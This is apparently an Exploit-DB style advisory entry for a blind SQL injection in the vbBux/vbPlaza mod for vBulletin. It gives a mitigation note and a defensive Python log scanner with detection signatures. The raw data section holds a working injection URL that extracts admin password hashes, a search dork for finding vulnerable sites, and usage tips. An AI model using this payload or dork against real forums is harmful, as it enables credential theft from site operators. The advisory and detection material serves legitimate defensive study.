vendor: vbBux/vbPlaza
by: Cold z3ro & Crck_Man
CVSS: 7.5 (HIGH)
CWE: 89 (Blind SQL Injection)
Product Name: vbBux/vbPlaza
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: YES
Related CWE: N/A
CPE: a:vbulletin:vbulletin_2.x
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability

A Blind SQL Injection vulnerability exists in the `name` parameter of vbplaza.php, a mod for vBulletin, and can be used to retrieve the admin password hash. An attacker exploits it by sending a specially crafted HTTP request to the vulnerable application: the injected condition wraps a character of the SELECT result in MySQL's substring() and ascii() functions and compares it against a number, so the page's true/false response reveals the hash one character at a time.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries; in practice that means passing values such as the `name` parameter through parameterized queries (prepared statements) rather than concatenating them into the SQL string.
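As a defender-side complement to the mitigation above, the following added example (not part of the original advisory or of vbBux/vbPlaza) scans Common Log Format access-log lines for the boolean-based probe pattern the advisory describes: a quote that closes the string literal, `/**/` comment-whitespace, an `ascii(substring(` character test, a nested `SELECT ... FROM ... LIMIT`, and a trailing `/*`. The log lines and IP addresses are constructed samples; requiring two independent indicators keeps an ordinary apostrophe in input from alerting on its own.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Constructed sample access-log lines (not real traffic): the third request carries the
# blind injection against vbplaza.php's `name` parameter; the fourth is benign with an apostrophe.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2009:10:01:12 +0000] "GET /forum/vbplaza.php?do=item&name=bank HTTP/1.1" 200 4321
203.0.113.5 - - [26/May/2009:10:01:15 +0000] "GET /forum/vbplaza.php?do=shop HTTP/1.1" 200 5120
198.51.100.7 - - [26/May/2009:10:02:40 +0000] "GET /forum/vbplaza.php?do=item&name=bank%27%2F%2A%2A%2Fand%2058%3Cascii(substring((SELECT%20concat(password,0x3a,username)%20from%20user%20limit%200,1),33,1))%2F%2A HTTP/1.1" 200 4321
198.51.100.7 - - [26/May/2009:10:02:41 +0000] "GET /forum/vbplaza.php?do=item&name=O%27Reilly%20Bank HTTP/1.1" 200 4321
"""

# Common Log Format: ip ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of the technique in the advisory: a quote closing the string literal followed
# (possibly through /**/ comment-whitespace) by a boolean operator, the ascii(substring(
# character probe, a nested SELECT ... FROM ... LIMIT, and a trailing /* comment.
SIGNATURES = [
    ("quote_then_boolean", re.compile(r"'\s*(?:/\*.*?\*/\s*)*(?:and|or)\b", re.I)),
    ("ascii_substring_probe", re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I)),
    ("nested_select_limit", re.compile(r"\bselect\b.*\bfrom\b.*\blimit\b", re.I | re.S)),
    ("trailing_comment", re.compile(r"/\*\s*$")),
]

def suspicious_params(target, min_hits=2):
    """Map each query parameter of a request target to the signature names it matched.
    Values are percent-decoded first so %27 is seen as a quote; a parameter is reported
    only when at least `min_hits` indicators fire, so a lone apostrophe (O'Reilly) is not
    enough to raise an alert by itself."""
    hits = {}
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            matched = [name for name, rx in SIGNATURES if rx.search(value)]
            if len(matched) >= min_hits:
                hits[param] = matched
    return hits

def scan_log(text):
    """Return (ip, status, param, matched_signatures) for every suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Common Log Format
        for param, matched in suspicious_params(m["target"]).items():
            alerts.append((m["ip"], int(m["status"]), param, matched))
    return alerts
```

Signature matching of this kind is a detection aid for spotting probing in retrospect or at a WAF, not a substitute for parameterized queries in the mod itself.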

Exploit-DB raw data:

--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--

AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"

DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash

EXPLOIT: 
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*

IE: ascii encodes
	58  => :
	48  => 0
	120 => x

NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin.


Copyrights : www.hackteach.org , www.h-t.cc

Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends 

# milw0rm.com [2009-05-26]